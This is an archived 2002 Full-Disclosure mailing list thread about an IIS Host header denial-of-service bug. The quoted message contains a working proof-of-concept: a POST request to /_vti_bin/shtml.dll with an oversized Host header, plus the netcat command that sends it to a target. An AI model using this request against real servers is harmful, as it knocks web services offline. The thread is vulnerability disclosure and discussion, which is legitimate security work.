lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
From: full-disclosure at lists.netsys.com (Full Disclosure)
Subject: How to reproduce the IIS Host Header DOS

Heh. I thought my screenshot DID show exactly how to reproduce the bug:
You run SPIKE! :> You can download SPIKE 2.7 at
http://www.immunitysec.com/spike.html - it's the exact version I used in
the demonstration screenshot.

You should read my actual commentary on the bug. The bug is actually IIS
servicing a stack overflow exception, and is not limited to
/_vti_bin/shtml.dll or any other particular file or directory. It also
affects IIS 5.1. It's not limited to the Host: field, as far as I can
tell. Any "stack overflow" exception will trigger this behavior.


Dave Aitel
Immunity, Inc.




On Fri, 2002-10-11 at 19:26, Joe Testa wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> 
> 
> - From the screenshots and descriptions given in
> <http://online.securityfocus.com/bid/5907>, it's not clear *exactly* how to
> reproduce the IIS Host header DoS.
> 
> A POST request like the following (between the [begin] and [end] lines)
> will
> manually reproduce the IIS DoS condition:
> 
> 
> - -------------------------[begin]--------------------------------------
> POST /_vti_bin/shtml.dll HTTP/1.0
> Host: [32762 '/' characters]
> Content-length:      22
> 
> 
> http://www.rapid7.com/
> - --------------------------[end]---------------------------------------
> 
> 
> This will cause the web service to consume 99% of the CPU for about 35
> seconds.  During this time, no other HTTP requests will be serviced.
> Attached
> to this email is the complete string to facilitate testing.  Use it with:
> 
> $ nc x.x.x.x 80 < iis_dos
> 
> 
>    - Joe Testa, Rapid 7, Inc.
>    http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x02B00839
>    A145 B158 2CA7 00A2 BAE8  4A18 57E5 18E0 02B0 0839
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (Cygwin32)
> 
> iD8DBQE9p1w3V+UY4AKwCDkRAjHQAJ0Vx5c1rJvDY5+n2595Wq6NQbqwOACeNBBO
> GcA6qrjAE1Tj+Jqx3kE9U4Q=
> =RkVz
> -----END PGP SIGNATURE-----
> 
> (See attached file: iis_dos)



Powered by blists - more mailing lists